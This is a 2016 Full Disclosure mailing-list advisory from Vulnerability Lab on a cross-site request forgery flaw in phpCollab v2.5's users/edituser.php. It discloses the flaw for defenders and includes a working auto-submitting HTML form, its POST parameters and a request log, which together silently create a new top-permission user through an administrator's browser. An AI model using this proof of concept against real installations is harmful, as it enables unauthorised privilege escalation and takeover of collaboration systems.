[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: [FD] phpCollab v2.5 CMS - Privilege Escalate CSRF Vulnerability
From: Vulnerability Lab <research () vulnerability-lab ! com>
Date: 2016-08-22 13:00:19
Message-ID: 6985b1f5-e2ad-af7c-9d10-d28509f20479 () vulnerability-lab ! com
[Download RAW message or body]
Document Title:
===============
phpCollab v2.5 CMS - Privilege Escalate CSRF Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1911
Release Date:
=============
2016-08-17
Vulnerability Laboratory ID (VL-ID):
====================================
1911
Common Vulnerability Scoring System:
====================================
3.3
Product & Service Introduction:
===============================
phpCollab is an open source internet-enabled system for use in projects that require \
collaboration over the internet. Those organizations, such as consulting firms, that rely on a \
division between firm-side and client-side information will benefit most from use of phpCollab.
Abstract Advisory Information:
==============================
An independent vulnerability laboratory researcher discovered a client-side cross site request \
forgery vulnerability in the phpCollab v2.5 content management system.
Vulnerability Disclosure Timeline:
==================================
2016-08-17: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Technical Details & Description:
================================
A cross site request forgery vulnerability has been discovered in the official phpCollab v2.5 \
content management system.
In the absence of security token an attacker could execute arbitrary code in the \
administrator's browser to have a privileged access. The vulnerability is located in the \
edituser.php file in the ./users/ path.
Request Method(s):
[+] POST
Vulnerable Module(s):
[+] ./phpcollab/users/
Vulnerable File(s):
[+] edituser.php
Vulnerable Parameter(s):
[+] id
Proof of Concept (PoC):
=======================
Cross site request forgery web vulnerability can be exploited by malicious web application \
without privileged user account and without user interaction. To demonstrate safety or \
reproduce csrf web vulnerability information and follow the steps below to continue provided.
PoC: CSRF Exploitation
<html>
<form accept-charset="UNKNOWN" method="POST" \
action="http://phpcollab.localhost:8080/phpcollab/users/edituser.php?id=&action=add&PHPSESSID=coflo6ves1ac5e177kf26mg7l7" \
name="ecDForm"/> <input type='hidden' name="un" value="VulnLabs">
<input type='hidden' name='fn' value="ZwX" />
<input type='hidden' name='em' value="test@live.fr"/>
<input type='hidden' name='pw' value="123123" />
<input type='hidden' name='pwa' value="123123" />
<input type='radio' name='perm' value='1' />
<input type='radio' name='perm' value='2' />
<input type='radio' name='perm' value='3' />
<input type='radio' name='perm' value='4' />
<input type='radio' name='perm' value='5' checked />
<tr class='odd'><td valign='top' class='leftvalue'> </td><td><input type='SUBMIT' \
value='Sauvegarder' /> </td></tr> <script>document.forms[0].submit()</script>
</form>
</html>
POST Method
[+] un=VulnLabs&fn=ZwX&em=test%40live.fr&pw=123123&pwa=123123&perm=5
--- PoC Session Logs ---
Status: 200 [OK]
Host: phpcollab.localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:48.0) Gecko/20100101 Firefox/48.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: __gads=ID=07968e6b89cfb5e9:T=1471277130:S=ALNI_Mb360EnbieGeQ6j0qksVtqioxOo6g; \
__utma=87180614.471852358.1471277221.1471289573.1471311800.4; __utmc=87180614; \
__utmz=87180614.1471311800.4.4.utmcsr=demo.opensourcecms.com|utmccn=(referral)|utmcmd=referral|utmcct=/phpcollab/general/login.php; \
PHPSESSID=eo2nfc7bqe68eugsgd7h0ehfh4; \
_pk_id.2.bb5e=83e7be2d899ec7fc.1471277247.4.1471313737.1471311796.; \
_pk_ref.2.bb5e=%5B%22%22%2C%22%22%2C1471311796%2C%22http%3A%2F%2Fwww.opensourcecms.com%2Fdemo%2F2%2F336%2FphpCollab%22%5D; \
wbTh=e; xwbR=e; _pk_ses.2.bb5e=*; __utmb=87180614.40.10.1471311800; __utmt=1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 62
Security Risk:
==============
The security risk of the remote cross site request forgery vulnerability in the phpcollab \
application is estimated as medium. (CVSS 3.3)
Credits & Authors:
==================
ZwX - ( http://zwx.fr ) [ http://www.vulnerability-lab.com/show.php?user=ZwX ]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. \
Vulnerability Lab disclaims all warranties, either expressed or implied, including the \
warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its \
suppliers are not liable in any case of damage, including direct, indirect, incidental, \
consequential loss of business profits or special damages, even if Vulnerability-Lab or its \
suppliers have been advised of the possibility of such damages. Some states do not allow the \
exclusion or limitation of liability for consequential or incidental damages so the foregoing \
limitation may not apply. We do not approve or encourage anybody to break any licenses, \
policies, deface websites, hack into databases or trade with stolen data.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Section: magazine.vulnerability-lab.com - vulnerability-lab.com/contact.php - \
evolution-sec.com/contact
Social: twitter.com/vuln_lab - facebook.com/VulnerabilityLab - \
youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - \
vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - \
vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php
Any modified copy or reproduction, including partially usages, of this file requires \
authorization from Vulnerability Laboratory. Permission to electronically redistribute this \
alert in its unmodified form is granted. All other rights, including the use of other media, \
are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, \
advisories, source code, videos and other information on this website is trademark of \
vulnerability-lab team & the specific authors or managers. To record, list, modify, use or \
edit our material contact (admin@ or research@vulnerability-lab.com) to get a ask permission.
Copyright © 2016 | Vulnerability Laboratory - [Evolution Security GmbH]â„¢
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic